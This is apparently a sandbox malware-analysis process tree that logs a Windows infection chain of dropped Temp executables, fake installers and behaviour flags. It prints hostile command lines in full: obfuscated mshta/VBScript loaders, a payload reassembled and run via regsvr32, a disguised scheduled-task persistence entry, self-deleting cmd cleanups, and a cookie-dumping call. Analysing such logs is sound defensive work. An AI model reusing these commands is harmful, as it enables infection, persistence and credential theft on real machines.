"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff75d95a890,0x7ff75d95a8a0,0x7ff75d95a8b0
9⤵
PID:5888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
8⤵
PID:6068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8
8⤵
PID:6536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8
8⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3476 /prefetch:8
8⤵
PID:6308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8
8⤵
PID:5156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8
8⤵
PID:5148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
8⤵
PID:4284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8
8⤵
PID:6312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
8⤵
PID:5300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:8
8⤵
PID:6788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
8⤵
PID:5456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:8
8⤵
PID:6544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
8⤵
PID:632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8
8⤵
PID:1380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
8⤵
PID:5792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8
8⤵
PID:6400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:8
8⤵
PID:6612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:8
8⤵
PID:5916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:8
8⤵
PID:6956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
8⤵
PID:2476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:8
8⤵
PID:6972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
8⤵
PID:6852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3388 /prefetch:8
8⤵
PID:6952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
8⤵
PID:6780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
8⤵
PID:4704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8
8⤵
PID:4548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
8⤵
PID:5348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8
8⤵
PID:6532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=724 /prefetch:8
8⤵
PID:4368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:8
8⤵
PID:6712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:8
8⤵
PID:6704

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3872

C:\Users\Admin\AppData\Local\Temp\25D.exe
C:\Users\Admin\AppData\Local\Temp\25D.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 25D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\25D.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:6692

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 25D.exe /f
3⤵
- Kills process with taskkill
PID:6832

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:5268

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5768

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:6044

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:6208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5824

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
1⤵
- Executes dropped EXE
PID:2484

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\335C.exe" /f
2⤵
- Creates scheduled task(s)
PID:6684

C:\Users\Admin\AppData\Local\Temp\3745.exe
C:\Users\Admin\AppData\Local\Temp\3745.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5292

C:\Users\Admin\AppData\Local\Temp\3C96.exe
C:\Users\Admin\AppData\Local\Temp\3C96.exe
1⤵
- Executes dropped EXE
PID:6372

C:\Users\Admin\AppData\Local\Temp\4590.exe
C:\Users\Admin\AppData\Local\Temp\4590.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5844

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3512

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5492

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5256

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5468

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5336

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2928

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4972

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5784

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\DFFC.exe
C:\Users\Admin\AppData\Local\Temp\DFFC.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:6656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im DFFC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DFFC.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:2124

C:\Windows\SysWOW64\taskkill.exe
taskkill /im DFFC.exe /f
3⤵
- Kills process with taskkill
PID:1916

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:5536

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:580

C:\Users\Admin\AppData\Local\Temp\E3F5.exe
C:\Users\Admin\AppData\Local\Temp\E3F5.exe
1⤵
- Executes dropped EXE
PID:5428

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )
2⤵
PID:5940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" ) do taskkill /Im "%~nxE" -F
3⤵
PID:4572

C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE
wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t
4⤵
- Executes dropped EXE
PID:6380

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If ""/PgRbPZTUXQ3fqTxJ5RJVzdoK5t "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )
5⤵
PID:5296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "/PgRbPZTUXQ3fqTxJ5RJVzdoK5t " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" ) do taskkill /Im "%~nxE" -F
6⤵
PID:5548

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRIpt: clOSE ( CReatEObjecT ("WSCRipt.ShElL"). RUN( "C:\Windows\system32\cmd.exe /q /C eCHO fx46oC:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;g9q> fHUZ28V.I0 & ECho | sET /p = ""MZ"" > PD~PO.Fu& Copy /y /B PD~PO.FU + 7KUTL.Vbk + FDiJ.1V + ShUJ.ChH +fHuZ28V.I0 m9HEkzA.2 & sTArT regsvr32.exe /U -S m9HEkZA.2 " , 0, TrUE) )
5⤵
PID:3332

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "E3F5.exe" -F
4⤵
- Kills process with taskkill
PID:6188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6204

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\4158.exe
C:\Users\Admin\AppData\Local\Temp\4158.exe
1⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\42A1.exe
C:\Users\Admin\AppData\Local\Temp\42A1.exe
1⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp" /SL5="$402A8,172303,88576,C:\Users\Admin\AppData\Local\Temp\42A1.exe"
2⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe
"C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
3⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:6280

C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe
"C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT
4⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp" /SL5="$B035C,5808768,66560,C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT
5⤵
- Suspicious use of FindShellTrayWindow
PID:5492

C:\Program Files (x86)\i-record\I-Record.exe
"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
6⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe
"C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe"
4⤵
- Checks computer location settings
PID:5800

C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe
"C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe"
4⤵
PID:1464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lb5l3mzl.5wu\GcleanerEU.exe /eufive & exit
5⤵
PID:6768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe & exit
5⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe
C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe
6⤵
PID:7032

C:\Users\Admin\AppData\Roaming\7597109.exe
"C:\Users\Admin\AppData\Roaming\7597109.exe"
7⤵
PID:4104

C:\Users\Admin\AppData\Roaming\5145379.exe
"C:\Users\Admin\AppData\Roaming\5145379.exe"
7⤵
- Suspicious behavior: SetClipboardViewer
PID:5244

C:\Users\Admin\AppData\Roaming\6009216.exe
"C:\Users\Admin\AppData\Roaming\6009216.exe"
7⤵
PID:6304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyzm0bxm.zkd\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:5188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623 & exit
5⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623
6⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp" /SL5="$10474,138429,56832,C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe" /Verysilent /subid=623
7⤵
- Suspicious use of FindShellTrayWindow
PID:6780

C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe" /Verysilent
8⤵
PID:5884

C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
9⤵
PID:408

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:3800

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:7996

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:6708

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:9164

C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
"C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
9⤵
PID:6788

C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp" /SL5="$3050A,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
10⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe
"C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe" /S /UID=burnerch1
11⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:6936

C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe
"C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT
12⤵
PID:7436

C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp" /SL5="$30584,281924,62464,C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT
13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7504

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
14⤵
PID:7692

C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe
"C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe"
12⤵
- Checks computer location settings
PID:7476

C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe
"C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe"
12⤵
PID:7576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obhd0sxq.uj5\GcleanerEU.exe /eufive & exit
13⤵
PID:1220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3isgf5zv.5q2\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:3816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=623 & exit
13⤵
PID:9020

C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=623
14⤵
PID:808

C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp" /SL5="$30440,138429,56832,C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe" /Verysilent /subid=623
15⤵
- Suspicious use of FindShellTrayWindow
PID:8196

C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe" /Verysilent
16⤵
PID:2792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe & exit
13⤵
PID:7348

C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe
C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe
14⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe
"C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe" -a
15⤵
PID:8680

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe & exit
13⤵
PID:4216

C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
14⤵
- Suspicious use of SetThreadContext
PID:8764

C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
15⤵
PID:7128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S & exit
13⤵
PID:8444

C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S
14⤵
- Drops file in Program Files directory
PID:8932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:7456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:8412

